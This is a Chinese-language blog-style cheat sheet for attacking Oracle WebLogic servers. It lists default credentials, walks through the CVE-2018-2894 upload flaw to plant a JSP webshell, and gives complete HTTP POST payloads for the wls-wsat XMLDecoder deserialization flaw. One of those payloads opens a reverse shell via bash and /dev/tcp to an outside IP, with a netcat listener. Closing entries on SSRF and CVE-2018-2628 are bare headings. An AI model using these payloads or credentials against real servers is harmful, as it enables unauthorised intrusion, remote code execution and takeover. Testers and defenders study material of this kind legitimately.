weblogic

标签：CVE wls 漏洞 Weblogic weblogic wsat 序列化

1.弱口令

weblogic后台地址：ip:7001/console

常用弱口令：

system:password
weblogic:weblogic
admin:secruity
joe:password
mary:password
system:sercurity
wlcsystem: wlcsystem
weblogic:Oracle@123

2.任意文件上传漏洞（CVE-2018-2894）[部署war包，getshell]

漏洞原理：Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞，进而获取服务器权限

漏洞利用：通过未授权访问/ws_utc/config.do页面，修改work home dir的工作目录为另一个未授权即可访问的目录，然后上传文件getshell

影响版本：

10.3.6，12.1.3
12.2.1.2，12.2.1.3

进入管理后台之后，点击base_domain,再点击高级，启用web服务测试页面，即可访问未授权页面/ws_utc/config.do【Oracle 7月更新中，修复了Weblogic Web Service Test Page中一处任意文件上传漏洞，Web Service
Test Page 在 ‘生产模式’ 下默认不开启，所以该漏洞有一定限制，漏洞存在页面在/ws_utc/config.do。】

访问之后，修改work home dir的目录地址为：/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

之后点击提交

点击安全-添加-上传webshell（可用冰蝎生成jsp），上传成功之后可以看到相应包：

可以看到返回包中有一个时间戳（应该是哈哈的那个id标签），待会要用

打开连接软件，这里我用冰蝎，路径为 http://you-ip/ws_utc/css/config/keystore/[时间戳]_[文件名]
http://192.168.0.161:7001/ws_utc/css/config/keystore/1628751524774_shell.jsp

即可连接成功

另一种，点击deployments，可看到一个应用列表，点击install

选择upload your files，点击browse上传war包

访问木马文件地址即可

3.XML Decoder反序列化

影响版本

10.3.6.0，12.1.3.0.0，12.2.1.1.0

漏洞地址

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

利用：

访问

ip:7001/wls-wsat/CoordinatorPortType

利用burpsuit抓包，将此页面的get请求包更改为post请求包，poc为：

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println">
<string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

访问

your-ip:7001/bea_wls_internal/test.jsp

反弹shell利用

反弹shell
1.nc监听端口 nc -l -p 7089
2.通过burpsuit自行修改数据包，exp改为反弹shell的命令
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: IP:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 640
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.206.132/7089 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

效果

4.Weblogic-SSRF漏洞（CVE-2014-4210）

影响版本：

10.0.2,    10.3.6

漏洞地址：

http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp

5.java反序列化(CVE-2018-2628)

相关文章

赞助商

阅读排行